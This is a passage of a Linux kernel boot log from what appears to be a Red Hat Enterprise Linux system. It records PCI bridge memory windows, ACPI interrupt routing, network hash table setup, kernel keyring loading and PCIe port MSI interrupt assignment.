pci 0000:00:15.6: bridge 32bit mmio: [0xfbd00000-0xfbdfffff]
pci 0000:00:15.6: bridge 64bit mmio pref: [0xea200000-0xea2fffff]
pci 0000:00:15.7: bridge 32bit mmio: [0xfb900000-0xfb9fffff]
pci 0000:00:15.7: bridge 64bit mmio pref: [0xe9e00000-0xe9efffff]
pci 0000:0b:00.0: reg 10 32bit mmio: [0xfd4fb000-0xfd4fbfff]
pci 0000:0b:00.0: reg 14 32bit mmio: [0xfd4fc000-0xfd4fcfff]
pci 0000:0b:00.0: reg 18 32bit mmio: [0xfd4fe000-0xfd4fffff]
pci 0000:0b:00.0: reg 1c io port: [0x5000-0x500f]
pci 0000:0b:00.0: reg 30 32bit mmio pref: [0x000000-0x00ffff]
pci 0000:0b:00.0: supports D1 D2
pci 0000:0b:00.0: PME# supported from D0 D1 D2 D3hot D3cold
pci 0000:0b:00.0: PME# disabled
pci 0000:0b:00.0: disabling ASPM on pre-1.1 PCIe device.  You can enable it with 'pcie_aspm=force'
pci 0000:00:16.0: bridge io port: [0x5000-0x5fff]
pci 0000:00:16.0: bridge 32bit mmio: [0xfd400000-0xfd4fffff]
pci 0000:00:16.0: bridge 64bit mmio pref: [0xeb900000-0xeb9fffff]
pci 0000:00:16.1: bridge io port: [0x9000-0x9fff]
pci 0000:00:16.1: bridge 32bit mmio: [0xfd000000-0xfd0fffff]
pci 0000:00:16.1: bridge 64bit mmio pref: [0xeb500000-0xeb5fffff]
pci 0000:00:16.2: bridge io port: [0xd000-0xdfff]
pci 0000:00:16.2: bridge 32bit mmio: [0xfcc00000-0xfccfffff]
pci 0000:00:16.2: bridge 64bit mmio pref: [0xeb100000-0xeb1fffff]
pci 0000:00:16.3: bridge 32bit mmio: [0xfc800000-0xfc8fffff]
pci 0000:00:16.3: bridge 64bit mmio pref: [0xead00000-0xeadfffff]
pci 0000:00:16.4: bridge 32bit mmio: [0xfc400000-0xfc4fffff]
pci 0000:00:16.4: bridge 64bit mmio pref: [0xea900000-0xea9fffff]
pci 0000:00:16.5: bridge 32bit mmio: [0xfc000000-0xfc0fffff]
pci 0000:00:16.5: bridge 64bit mmio pref: [0xea500000-0xea5fffff]
pci 0000:00:16.6: bridge 32bit mmio: [0xfbc00000-0xfbcfffff]
pci 0000:00:16.6: bridge 64bit mmio pref: [0xea100000-0xea1fffff]
pci 0000:00:16.7: bridge 32bit mmio: [0xfb800000-0xfb8fffff]
pci 0000:00:16.7: bridge 64bit mmio pref: [0xe9d00000-0xe9dfffff]
pci 0000:13:00.0: reg 10 32bit mmio: [0xfd3fb000-0xfd3fbfff]
pci 0000:13:00.0: reg 14 32bit mmio: [0xfd3fc000-0xfd3fcfff]
pci 0000:13:00.0: reg 18 32bit mmio: [0xfd3fe000-0xfd3fffff]
pci 0000:13:00.0: reg 1c io port: [0x6000-0x600f]
pci 0000:13:00.0: reg 30 32bit mmio pref: [0x000000-0x00ffff]
pci 0000:13:00.0: supports D1 D2
pci 0000:13:00.0: PME# supported from D0 D1 D2 D3hot D3cold
pci 0000:13:00.0: PME# disabled
pci 0000:13:00.0: disabling ASPM on pre-1.1 PCIe device.  You can enable it with 'pcie_aspm=force'
pci 0000:00:17.0: bridge io port: [0x6000-0x6fff]
pci 0000:00:17.0: bridge 32bit mmio: [0xfd300000-0xfd3fffff]
pci 0000:00:17.0: bridge 64bit mmio pref: [0xeb800000-0xeb8fffff]
pci 0000:00:17.1: bridge io port: [0xa000-0xafff]
pci 0000:00:17.1: bridge 32bit mmio: [0xfcf00000-0xfcffffff]
pci 0000:00:17.1: bridge 64bit mmio pref: [0xeb400000-0xeb4fffff]
pci 0000:00:17.2: bridge io port: [0xe000-0xefff]
pci 0000:00:17.2: bridge 32bit mmio: [0xfcb00000-0xfcbfffff]
pci 0000:00:17.2: bridge 64bit mmio pref: [0xeb000000-0xeb0fffff]
pci 0000:00:17.3: bridge 32bit mmio: [0xfc700000-0xfc7fffff]
pci 0000:00:17.3: bridge 64bit mmio pref: [0xeac00000-0xeacfffff]
pci 0000:00:17.4: bridge 32bit mmio: [0xfc300000-0xfc3fffff]
pci 0000:00:17.4: bridge 64bit mmio pref: [0xea800000-0xea8fffff]
pci 0000:00:17.5: bridge 32bit mmio: [0xfbf00000-0xfbffffff]
pci 0000:00:17.5: bridge 64bit mmio pref: [0xea400000-0xea4fffff]
pci 0000:00:17.6: bridge 32bit mmio: [0xfbb00000-0xfbbfffff]
pci 0000:00:17.6: bridge 64bit mmio pref: [0xea000000-0xea0fffff]
pci 0000:00:17.7: bridge 32bit mmio: [0xfb700000-0xfb7fffff]
pci 0000:00:17.7: bridge 64bit mmio pref: [0xe9c00000-0xe9cfffff]
pci 0000:00:18.0: bridge io port: [0x7000-0x7fff]
pci 0000:00:18.0: bridge 32bit mmio: [0xfd200000-0xfd2fffff]
pci 0000:00:18.0: bridge 64bit mmio pref: [0xeb700000-0xeb7fffff]
pci 0000:00:18.1: bridge io port: [0xb000-0xbfff]
pci 0000:00:18.1: bridge 32bit mmio: [0xfce00000-0xfcefffff]
pci 0000:00:18.1: bridge 64bit mmio pref: [0xeb300000-0xeb3fffff]
pci 0000:00:18.2: bridge 32bit mmio: [0xfca00000-0xfcafffff]
pci 0000:00:18.2: bridge 64bit mmio pref: [0xeaf00000-0xeaffffff]
pci 0000:00:18.3: bridge 32bit mmio: [0xfc600000-0xfc6fffff]
pci 0000:00:18.3: bridge 64bit mmio pref: [0xeab00000-0xeabfffff]
pci 0000:00:18.4: bridge 32bit mmio: [0xfc200000-0xfc2fffff]
pci 0000:00:18.4: bridge 64bit mmio pref: [0xea700000-0xea7fffff]
pci 0000:00:18.5: bridge 32bit mmio: [0xfbe00000-0xfbefffff]
pci 0000:00:18.5: bridge 64bit mmio pref: [0xea300000-0xea3fffff]
pci 0000:00:18.6: bridge 32bit mmio: [0xfba00000-0xfbafffff]
pci 0000:00:18.6: bridge 64bit mmio pref: [0xe9f00000-0xe9ffffff]
pci 0000:00:18.7: bridge 32bit mmio: [0xfb600000-0xfb6fffff]
pci 0000:00:18.7: bridge 64bit mmio pref: [0xe9b00000-0xe9bfffff]
ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT]
 pci0000:00: Requesting ACPI _OSC control (0x1d)
 pci0000:00: ACPI _OSC control (0x15) granted
ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 5 6 7 *9 10 11 14 15)
ACPI: PCI Interrupt Link [LNKB] (IRQs 3 4 5 6 7 9 10 11 14 15) *0, disabled.
ACPI: PCI Interrupt Link [LNKC] (IRQs 3 4 5 6 7 9 10 *11 14 15)
ACPI: PCI Interrupt Link [LNKD] (IRQs 3 4 5 6 7 9 *10 11 14 15)
vgaarb: device added: PCI:0000:00:0f.0,decodes=io+mem,owns=io+mem,locks=none
vgaarb: loaded
vgaarb: bridge control possible 0000:00:0f.0
SCSI subsystem initialized
libata version 3.00 loaded.
usbcore: registered new interface driver usbfs
usbcore: registered new interface driver hub
usbcore: registered new device driver usb
PCI: Using ACPI for IRQ routing
PCI: old code would have set cacheline size to 32 bytes, but clflush_size = 64
PCI: pci_cache_line_size set to 64 bytes
NetLabel: Initializing
NetLabel:  domain hash size = 128
NetLabel:  protocols = UNLABELED CIPSOv4
NetLabel:  unlabeled traffic allowed by default
hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
hpet0: 16 comparators, 64-bit 14.318180 MHz counter
Switching to clocksource tsc
pnp: PnP ACPI init
ACPI: bus type pnp registered
pnp: PnP ACPI: found 269 devices
ACPI: ACPI bus type pnp unregistered
system 00:01: ioport range 0x1000-0x103f has been reserved
system 00:01: ioport range 0x1040-0x104f has been reserved
system 00:01: ioport range 0xcf0-0xcf1 has been reserved
system 00:08: iomem range 0xfed00000-0xfed003ff has been reserved
system 00:0d: ioport range 0xfce0-0xfcff has been reserved
system 00:0d: iomem range 0xf0000000-0xf7ffffff has been reserved
system 00:0d: iomem range 0xfe800000-0xfe9fffff has been reserved
pci 0000:00:15.3: BAR 13: can't allocate I/O resource [0x1000-0x1fff]
pci 0000:00:15.4: BAR 13: can't allocate I/O resource [0x1000-0x1fff]
pci 0000:00:15.5: BAR 13: can't allocate I/O resource [0x1000-0x1fff]
pci 0000:00:15.6: BAR 13: can't allocate I/O resource [0x1000-0x1fff]
pci 0000:00:15.7: BAR 13: can't allocate I/O resource [0x1000-0x1fff]
pci 0000:00:16.3: BAR 13: can't allocate I/O resource [0x1000-0x1fff]
pci 0000:00:16.4: BAR 13: can't allocate I/O resource [0x1000-0x1fff]
pci 0000:00:16.5: BAR 13: can't allocate I/O resource [0x1000-0x1fff]
pci 0000:00:16.6: BAR 13: can't allocate I/O resource [0x1000-0x1fff]
pci 0000:00:16.7: BAR 13: can't allocate I/O resource [0x1000-0x1fff]
pci 0000:00:17.3: BAR 13: can't allocate I/O resource [0x1000-0x1fff]
pci 0000:00:17.4: BAR 13: can't allocate I/O resource [0x1000-0x1fff]
pci 0000:00:17.5: BAR 13: can't allocate I/O resource [0x1000-0x1fff]
pci 0000:00:17.6: BAR 13: can't allocate I/O resource [0x1000-0x1fff]
pci 0000:00:17.7: BAR 13: can't allocate I/O resource [0x1000-0x1fff]
pci 0000:00:18.2: BAR 13: can't allocate I/O resource [0x1000-0x1fff]
pci 0000:00:18.3: BAR 13: can't allocate I/O resource [0x1000-0x1fff]
pci 0000:00:18.4: BAR 13: can't allocate I/O resource [0x1000-0x1fff]
pci 0000:00:18.5: BAR 13: can't allocate I/O resource [0x1000-0x1fff]
pci 0000:00:18.6: BAR 13: can't allocate I/O resource [0x1000-0x1fff]
pci 0000:00:18.7: BAR 13: can't allocate I/O resource [0x1000-0x1fff]
pci 0000:00:01.0: PCI bridge to [bus 01-01]
pci 0000:00:01.0: PCI bridge, secondary bus 0000:01
pci 0000:00:01.0:   bridge window [io  disabled]
pci 0000:00:01.0:   bridge window [mem disabled]
pci 0000:00:01.0:   bridge window [mem pref disabled]
pci 0000:00:11.0: PCI bridge to [bus 02-02]
pci 0000:00:11.0: PCI bridge, secondary bus 0000:02
pci 0000:00:11.0:   bridge window [0x2000-0x3fff]
pci 0000:00:11.0:   bridge window [0xfd600000-0xfdffffff]
pci 0000:00:11.0:   bridge window [0xebb00000-0xebffffff]
pci 0000:00:15.0: PCI bridge to [bus 03-03]
pci 0000:00:15.0: PCI bridge, secondary bus 0000:03
pci 0000:00:15.0:   bridge window [0x4000-0x4fff]
pci 0000:00:15.0:   bridge window [0xfd500000-0xfd5fffff]
pci 0000:00:15.0:   bridge window [0xeba00000-0xebafffff]
pci 0000:00:15.1: PCI bridge to [bus 04-04]
pci 0000:00:15.1: PCI bridge, secondary bus 0000:04
pci 0000:00:15.1:   bridge window [0x8000-0x8fff]
pci 0000:00:15.1:   bridge window [0xfd100000-0xfd1fffff]
pci 0000:00:15.1:   bridge window [0xeb600000-0xeb6fffff]
pci 0000:00:15.2: PCI bridge to [bus 05-05]
pci 0000:00:15.2: PCI bridge, secondary bus 0000:05
pci 0000:00:15.2:   bridge window [0xc000-0xcfff]
pci 0000:00:15.2:   bridge window [0xfcd00000-0xfcdfffff]
pci 0000:00:15.2:   bridge window [0xeb200000-0xeb2fffff]
pci 0000:00:15.3: PCI bridge to [bus 06-06]
pci 0000:00:15.3: PCI bridge, secondary bus 0000:06
pci 0000:00:15.3:   bridge window [io  disabled]
pci 0000:00:15.3:   bridge window [0xfc900000-0xfc9fffff]
pci 0000:00:15.3:   bridge window [0xeae00000-0xeaefffff]
pci 0000:00:15.4: PCI bridge to [bus 07-07]
pci 0000:00:15.4: PCI bridge, secondary bus 0000:07
pci 0000:00:15.4:   bridge window [io  disabled]
pci 0000:00:15.4:   bridge window [0xfc500000-0xfc5fffff]
pci 0000:00:15.4:   bridge window [0xeaa00000-0xeaafffff]
pci 0000:00:15.5: PCI bridge to [bus 08-08]
pci 0000:00:15.5: PCI bridge, secondary bus 0000:08
pci 0000:00:15.5:   bridge window [io  disabled]
pci 0000:00:15.5:   bridge window [0xfc100000-0xfc1fffff]
pci 0000:00:15.5:   bridge window [0xea600000-0xea6fffff]
pci 0000:00:15.6: PCI bridge to [bus 09-09]
pci 0000:00:15.6: PCI bridge, secondary bus 0000:09
pci 0000:00:15.6:   bridge window [io  disabled]
pci 0000:00:15.6:   bridge window [0xfbd00000-0xfbdfffff]
pci 0000:00:15.6:   bridge window [0xea200000-0xea2fffff]
pci 0000:00:15.7: PCI bridge to [bus 0a-0a]
pci 0000:00:15.7: PCI bridge, secondary bus 0000:0a
pci 0000:00:15.7:   bridge window [io  disabled]
pci 0000:00:15.7:   bridge window [0xfb900000-0xfb9fffff]
pci 0000:00:15.7:   bridge window [0xe9e00000-0xe9efffff]
pci 0000:00:16.0: PCI bridge to [bus 0b-0b]
pci 0000:00:16.0: PCI bridge, secondary bus 0000:0b
pci 0000:00:16.0:   bridge window [0x5000-0x5fff]
pci 0000:00:16.0:   bridge window [0xfd400000-0xfd4fffff]
pci 0000:00:16.0:   bridge window [0xeb900000-0xeb9fffff]
pci 0000:00:16.1: PCI bridge to [bus 0c-0c]
pci 0000:00:16.1: PCI bridge, secondary bus 0000:0c
pci 0000:00:16.1:   bridge window [0x9000-0x9fff]
pci 0000:00:16.1:   bridge window [0xfd000000-0xfd0fffff]
pci 0000:00:16.1:   bridge window [0xeb500000-0xeb5fffff]
pci 0000:00:16.2: PCI bridge to [bus 0d-0d]
pci 0000:00:16.2: PCI bridge, secondary bus 0000:0d
pci 0000:00:16.2:   bridge window [0xd000-0xdfff]
pci 0000:00:16.2:   bridge window [0xfcc00000-0xfccfffff]
pci 0000:00:16.2:   bridge window [0xeb100000-0xeb1fffff]
pci 0000:00:16.3: PCI bridge to [bus 0e-0e]
pci 0000:00:16.3: PCI bridge, secondary bus 0000:0e
pci 0000:00:16.3:   bridge window [io  disabled]
pci 0000:00:16.3:   bridge window [0xfc800000-0xfc8fffff]
pci 0000:00:16.3:   bridge window [0xead00000-0xeadfffff]
pci 0000:00:16.4: PCI bridge to [bus 0f-0f]
pci 0000:00:16.4: PCI bridge, secondary bus 0000:0f
pci 0000:00:16.4:   bridge window [io  disabled]
pci 0000:00:16.4:   bridge window [0xfc400000-0xfc4fffff]
pci 0000:00:16.4:   bridge window [0xea900000-0xea9fffff]
pci 0000:00:16.5: PCI bridge to [bus 10-10]
pci 0000:00:16.5: PCI bridge, secondary bus 0000:10
pci 0000:00:16.5:   bridge window [io  disabled]
pci 0000:00:16.5:   bridge window [0xfc000000-0xfc0fffff]
pci 0000:00:16.5:   bridge window [0xea500000-0xea5fffff]
pci 0000:00:16.6: PCI bridge to [bus 11-11]
pci 0000:00:16.6: PCI bridge, secondary bus 0000:11
pci 0000:00:16.6:   bridge window [io  disabled]
pci 0000:00:16.6:   bridge window [0xfbc00000-0xfbcfffff]
pci 0000:00:16.6:   bridge window [0xea100000-0xea1fffff]
pci 0000:00:16.7: PCI bridge to [bus 12-12]
pci 0000:00:16.7: PCI bridge, secondary bus 0000:12
pci 0000:00:16.7:   bridge window [io  disabled]
pci 0000:00:16.7:   bridge window [0xfb800000-0xfb8fffff]
pci 0000:00:16.7:   bridge window [0xe9d00000-0xe9dfffff]
pci 0000:00:17.0: PCI bridge to [bus 13-13]
pci 0000:00:17.0: PCI bridge, secondary bus 0000:13
pci 0000:00:17.0:   bridge window [0x6000-0x6fff]
pci 0000:00:17.0:   bridge window [0xfd300000-0xfd3fffff]
pci 0000:00:17.0:   bridge window [0xeb800000-0xeb8fffff]
pci 0000:00:17.1: PCI bridge to [bus 14-14]
pci 0000:00:17.1: PCI bridge, secondary bus 0000:14
pci 0000:00:17.1:   bridge window [0xa000-0xafff]
pci 0000:00:17.1:   bridge window [0xfcf00000-0xfcffffff]
pci 0000:00:17.1:   bridge window [0xeb400000-0xeb4fffff]
pci 0000:00:17.2: PCI bridge to [bus 15-15]
pci 0000:00:17.2: PCI bridge, secondary bus 0000:15
pci 0000:00:17.2:   bridge window [0xe000-0xefff]
pci 0000:00:17.2:   bridge window [0xfcb00000-0xfcbfffff]
pci 0000:00:17.2:   bridge window [0xeb000000-0xeb0fffff]
pci 0000:00:17.3: PCI bridge to [bus 16-16]
pci 0000:00:17.3: PCI bridge, secondary bus 0000:16
pci 0000:00:17.3:   bridge window [io  disabled]
pci 0000:00:17.3:   bridge window [0xfc700000-0xfc7fffff]
pci 0000:00:17.3:   bridge window [0xeac00000-0xeacfffff]
pci 0000:00:17.4: PCI bridge to [bus 17-17]
pci 0000:00:17.4: PCI bridge, secondary bus 0000:17
pci 0000:00:17.4:   bridge window [io  disabled]
pci 0000:00:17.4:   bridge window [0xfc300000-0xfc3fffff]
pci 0000:00:17.4:   bridge window [0xea800000-0xea8fffff]
pci 0000:00:17.5: PCI bridge to [bus 18-18]
pci 0000:00:17.5: PCI bridge, secondary bus 0000:18
pci 0000:00:17.5:   bridge window [io  disabled]
pci 0000:00:17.5:   bridge window [0xfbf00000-0xfbffffff]
pci 0000:00:17.5:   bridge window [0xea400000-0xea4fffff]
pci 0000:00:17.6: PCI bridge to [bus 19-19]
pci 0000:00:17.6: PCI bridge, secondary bus 0000:19
pci 0000:00:17.6:   bridge window [io  disabled]
pci 0000:00:17.6:   bridge window [0xfbb00000-0xfbbfffff]
pci 0000:00:17.6:   bridge window [0xea000000-0xea0fffff]
pci 0000:00:17.7: PCI bridge to [bus 1a-1a]
pci 0000:00:17.7: PCI bridge, secondary bus 0000:1a
pci 0000:00:17.7:   bridge window [io  disabled]
pci 0000:00:17.7:   bridge window [0xfb700000-0xfb7fffff]
pci 0000:00:17.7:   bridge window [0xe9c00000-0xe9cfffff]
pci 0000:00:18.0: PCI bridge to [bus 1b-1b]
pci 0000:00:18.0: PCI bridge, secondary bus 0000:1b
pci 0000:00:18.0:   bridge window [0x7000-0x7fff]
pci 0000:00:18.0:   bridge window [0xfd200000-0xfd2fffff]
pci 0000:00:18.0:   bridge window [0xeb700000-0xeb7fffff]
pci 0000:00:18.1: PCI bridge to [bus 1c-1c]
pci 0000:00:18.1: PCI bridge, secondary bus 0000:1c
pci 0000:00:18.1:   bridge window [0xb000-0xbfff]
pci 0000:00:18.1:   bridge window [0xfce00000-0xfcefffff]
pci 0000:00:18.1:   bridge window [0xeb300000-0xeb3fffff]
pci 0000:00:18.2: PCI bridge to [bus 1d-1d]
pci 0000:00:18.2: PCI bridge, secondary bus 0000:1d
pci 0000:00:18.2:   bridge window [io  disabled]
pci 0000:00:18.2:   bridge window [0xfca00000-0xfcafffff]
pci 0000:00:18.2:   bridge window [0xeaf00000-0xeaffffff]
pci 0000:00:18.3: PCI bridge to [bus 1e-1e]
pci 0000:00:18.3: PCI bridge, secondary bus 0000:1e
pci 0000:00:18.3:   bridge window [io  disabled]
pci 0000:00:18.3:   bridge window [0xfc600000-0xfc6fffff]
pci 0000:00:18.3:   bridge window [0xeab00000-0xeabfffff]
pci 0000:00:18.4: PCI bridge to [bus 1f-1f]
pci 0000:00:18.4: PCI bridge, secondary bus 0000:1f
pci 0000:00:18.4:   bridge window [io  disabled]
pci 0000:00:18.4:   bridge window [0xfc200000-0xfc2fffff]
pci 0000:00:18.4:   bridge window [0xea700000-0xea7fffff]
pci 0000:00:18.5: PCI bridge to [bus 20-20]
pci 0000:00:18.5: PCI bridge, secondary bus 0000:20
pci 0000:00:18.5:   bridge window [io  disabled]
pci 0000:00:18.5:   bridge window [0xfbe00000-0xfbefffff]
pci 0000:00:18.5:   bridge window [0xea300000-0xea3fffff]
pci 0000:00:18.6: PCI bridge to [bus 21-21]
pci 0000:00:18.6: PCI bridge, secondary bus 0000:21
pci 0000:00:18.6:   bridge window [io  disabled]
pci 0000:00:18.6:   bridge window [0xfba00000-0xfbafffff]
pci 0000:00:18.6:   bridge window [0xe9f00000-0xe9ffffff]
pci 0000:00:18.7: PCI bridge to [bus 22-22]
pci 0000:00:18.7: PCI bridge, secondary bus 0000:22
pci 0000:00:18.7:   bridge window [io  disabled]
pci 0000:00:18.7:   bridge window [0xfb600000-0xfb6fffff]
pci 0000:00:18.7:   bridge window [0xe9b00000-0xe9bfffff]
pci 0000:00:01.0: setting latency timer to 64
pci 0000:00:15.0: setting latency timer to 64
pci 0000:00:15.1: setting latency timer to 64
pci 0000:00:15.2: setting latency timer to 64
pci 0000:00:15.3: setting latency timer to 64
pci 0000:00:15.4: setting latency timer to 64
pci 0000:00:15.5: setting latency timer to 64
pci 0000:00:15.6: setting latency timer to 64
pci 0000:00:15.7: setting latency timer to 64
pci 0000:00:16.0: setting latency timer to 64
pci 0000:00:16.1: setting latency timer to 64
pci 0000:00:16.2: setting latency timer to 64
pci 0000:00:16.3: setting latency timer to 64
pci 0000:00:16.4: setting latency timer to 64
pci 0000:00:16.5: setting latency timer to 64
pci 0000:00:16.6: setting latency timer to 64
pci 0000:00:16.7: setting latency timer to 64
pci 0000:00:17.0: setting latency timer to 64
pci 0000:00:17.1: setting latency timer to 64
pci 0000:00:17.2: setting latency timer to 64
pci 0000:00:17.3: setting latency timer to 64
pci 0000:00:17.4: setting latency timer to 64
pci 0000:00:17.5: setting latency timer to 64
pci 0000:00:17.6: setting latency timer to 64
pci 0000:00:17.7: setting latency timer to 64
pci 0000:00:18.0: setting latency timer to 64
pci 0000:00:18.1: setting latency timer to 64
pci 0000:00:18.2: setting latency timer to 64
pci 0000:00:18.3: setting latency timer to 64
pci 0000:00:18.4: setting latency timer to 64
pci 0000:00:18.5: setting latency timer to 64
pci 0000:00:18.6: setting latency timer to 64
pci 0000:00:18.7: setting latency timer to 64
pci_bus 0000:00: resource 0 io:  [0x00-0xffff]
pci_bus 0000:00: resource 1 mem: [0x000000-0xffffffffffffffff]
pci_bus 0000:02: resource 0 io:  [0x2000-0x3fff]
pci_bus 0000:02: resource 1 mem: [0xfd600000-0xfdffffff]
pci_bus 0000:02: resource 2 pref mem [0xebb00000-0xebffffff]
pci_bus 0000:02: resource 3 io:  [0x00-0xffff]
pci_bus 0000:02: resource 4 mem: [0x000000-0xffffffffffffffff]
pci_bus 0000:03: resource 0 io:  [0x4000-0x4fff]
pci_bus 0000:03: resource 1 mem: [0xfd500000-0xfd5fffff]
pci_bus 0000:03: resource 2 pref mem [0xeba00000-0xebafffff]
pci_bus 0000:04: resource 0 io:  [0x8000-0x8fff]
pci_bus 0000:04: resource 1 mem: [0xfd100000-0xfd1fffff]
pci_bus 0000:04: resource 2 pref mem [0xeb600000-0xeb6fffff]
pci_bus 0000:05: resource 0 io:  [0xc000-0xcfff]
pci_bus 0000:05: resource 1 mem: [0xfcd00000-0xfcdfffff]
pci_bus 0000:05: resource 2 pref mem [0xeb200000-0xeb2fffff]
pci_bus 0000:06: resource 1 mem: [0xfc900000-0xfc9fffff]
pci_bus 0000:06: resource 2 pref mem [0xeae00000-0xeaefffff]
pci_bus 0000:07: resource 1 mem: [0xfc500000-0xfc5fffff]
pci_bus 0000:07: resource 2 pref mem [0xeaa00000-0xeaafffff]
pci_bus 0000:08: resource 1 mem: [0xfc100000-0xfc1fffff]
pci_bus 0000:08: resource 2 pref mem [0xea600000-0xea6fffff]
pci_bus 0000:09: resource 1 mem: [0xfbd00000-0xfbdfffff]
pci_bus 0000:09: resource 2 pref mem [0xea200000-0xea2fffff]
pci_bus 0000:0a: resource 1 mem: [0xfb900000-0xfb9fffff]
pci_bus 0000:0a: resource 2 pref mem [0xe9e00000-0xe9efffff]
pci_bus 0000:0b: resource 0 io:  [0x5000-0x5fff]
pci_bus 0000:0b: resource 1 mem: [0xfd400000-0xfd4fffff]
pci_bus 0000:0b: resource 2 pref mem [0xeb900000-0xeb9fffff]
pci_bus 0000:0c: resource 0 io:  [0x9000-0x9fff]
pci_bus 0000:0c: resource 1 mem: [0xfd000000-0xfd0fffff]
pci_bus 0000:0c: resource 2 pref mem [0xeb500000-0xeb5fffff]
pci_bus 0000:0d: resource 0 io:  [0xd000-0xdfff]
pci_bus 0000:0d: resource 1 mem: [0xfcc00000-0xfccfffff]
pci_bus 0000:0d: resource 2 pref mem [0xeb100000-0xeb1fffff]
pci_bus 0000:0e: resource 1 mem: [0xfc800000-0xfc8fffff]
pci_bus 0000:0e: resource 2 pref mem [0xead00000-0xeadfffff]
pci_bus 0000:0f: resource 1 mem: [0xfc400000-0xfc4fffff]
pci_bus 0000:0f: resource 2 pref mem [0xea900000-0xea9fffff]
pci_bus 0000:10: resource 1 mem: [0xfc000000-0xfc0fffff]
pci_bus 0000:10: resource 2 pref mem [0xea500000-0xea5fffff]
pci_bus 0000:11: resource 1 mem: [0xfbc00000-0xfbcfffff]
pci_bus 0000:11: resource 2 pref mem [0xea100000-0xea1fffff]
pci_bus 0000:12: resource 1 mem: [0xfb800000-0xfb8fffff]
pci_bus 0000:12: resource 2 pref mem [0xe9d00000-0xe9dfffff]
pci_bus 0000:13: resource 0 io:  [0x6000-0x6fff]
pci_bus 0000:13: resource 1 mem: [0xfd300000-0xfd3fffff]
pci_bus 0000:13: resource 2 pref mem [0xeb800000-0xeb8fffff]
pci_bus 0000:14: resource 0 io:  [0xa000-0xafff]
pci_bus 0000:14: resource 1 mem: [0xfcf00000-0xfcffffff]
pci_bus 0000:14: resource 2 pref mem [0xeb400000-0xeb4fffff]
pci_bus 0000:15: resource 0 io:  [0xe000-0xefff]
pci_bus 0000:15: resource 1 mem: [0xfcb00000-0xfcbfffff]
pci_bus 0000:15: resource 2 pref mem [0xeb000000-0xeb0fffff]
pci_bus 0000:16: resource 1 mem: [0xfc700000-0xfc7fffff]
pci_bus 0000:16: resource 2 pref mem [0xeac00000-0xeacfffff]
pci_bus 0000:17: resource 1 mem: [0xfc300000-0xfc3fffff]
pci_bus 0000:17: resource 2 pref mem [0xea800000-0xea8fffff]
pci_bus 0000:18: resource 1 mem: [0xfbf00000-0xfbffffff]
pci_bus 0000:18: resource 2 pref mem [0xea400000-0xea4fffff]
pci_bus 0000:19: resource 1 mem: [0xfbb00000-0xfbbfffff]
pci_bus 0000:19: resource 2 pref mem [0xea000000-0xea0fffff]
pci_bus 0000:1a: resource 1 mem: [0xfb700000-0xfb7fffff]
pci_bus 0000:1a: resource 2 pref mem [0xe9c00000-0xe9cfffff]
pci_bus 0000:1b: resource 0 io:  [0x7000-0x7fff]
pci_bus 0000:1b: resource 1 mem: [0xfd200000-0xfd2fffff]
pci_bus 0000:1b: resource 2 pref mem [0xeb700000-0xeb7fffff]
pci_bus 0000:1c: resource 0 io:  [0xb000-0xbfff]
pci_bus 0000:1c: resource 1 mem: [0xfce00000-0xfcefffff]
pci_bus 0000:1c: resource 2 pref mem [0xeb300000-0xeb3fffff]
pci_bus 0000:1d: resource 1 mem: [0xfca00000-0xfcafffff]
pci_bus 0000:1d: resource 2 pref mem [0xeaf00000-0xeaffffff]
pci_bus 0000:1e: resource 1 mem: [0xfc600000-0xfc6fffff]
pci_bus 0000:1e: resource 2 pref mem [0xeab00000-0xeabfffff]
pci_bus 0000:1f: resource 1 mem: [0xfc200000-0xfc2fffff]
pci_bus 0000:1f: resource 2 pref mem [0xea700000-0xea7fffff]
pci_bus 0000:20: resource 1 mem: [0xfbe00000-0xfbefffff]
pci_bus 0000:20: resource 2 pref mem [0xea300000-0xea3fffff]
pci_bus 0000:21: resource 1 mem: [0xfba00000-0xfbafffff]
pci_bus 0000:21: resource 2 pref mem [0xe9f00000-0xe9ffffff]
pci_bus 0000:22: resource 1 mem: [0xfb600000-0xfb6fffff]
pci_bus 0000:22: resource 2 pref mem [0xe9b00000-0xe9bfffff]
NET: Registered protocol family 2
IP route cache hash table entries: 524288 (order: 10, 4194304 bytes)
TCP established hash table entries: 524288 (order: 11, 8388608 bytes)
TCP bind hash table entries: 65536 (order: 8, 1048576 bytes)
TCP: Hash tables configured (established 524288 bind 65536)
TCP reno registered
NET: Registered protocol family 1
pci 0000:00:00.0: Limiting direct PCI/PCI transfers
pci 0000:00:0f.0: Boot video device
Trying to unpack rootfs image as initramfs...
Freeing initrd memory: 15524k freed
Simple Boot Flag at 0x36 set to 0x80
audit: initializing netlink socket (disabled)
type=2000 audit(1487290245.024:1): initialized
HugeTLB registered 2 MB page size, pre-allocated 0 pages
VFS: Disk quotas dquot_6.5.2
Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
msgmni has been set to 32768
SELinux:  Registering netfilter hooks
alg: No test for stdrng (krng)
ksign: Installing public key data
Loading keyring
- Added public key 4BB1E63D18B42658
- User ID: Red Hat, Inc. (Kernel Module GPG key)
- Added public key D4A26C9CCD09BEDA
- User ID: Red Hat Enterprise Linux Driver Update Program 
Block layer SCSI generic (bsg) driver version 0.4 loaded (major 252)
io scheduler noop registered
io scheduler anticipatory registered
io scheduler deadline registered
io scheduler cfq registered (default)
pcieport 0000:00:15.0: setting latency timer to 64
  alloc irq_desc for 24 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:15.0: irq 24 for MSI/MSI-X
pcieport 0000:00:15.1: setting latency timer to 64
  alloc irq_desc for 25 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:15.1: irq 25 for MSI/MSI-X
pcieport 0000:00:15.2: setting latency timer to 64
  alloc irq_desc for 26 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:15.2: irq 26 for MSI/MSI-X
pcieport 0000:00:15.3: setting latency timer to 64
  alloc irq_desc for 27 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:15.3: irq 27 for MSI/MSI-X
pcieport 0000:00:15.4: setting latency timer to 64
  alloc irq_desc for 28 on node -1
  alloc kstat_irqs on node -1
pcieport 0000:00:15.4: irq 28 for MSI/MSI-X
pcieport 0000:00:15.5: setting latency timer to 64
  alloc irq_desc for 29 on node -1
  alloc kstat_irqs on node -1
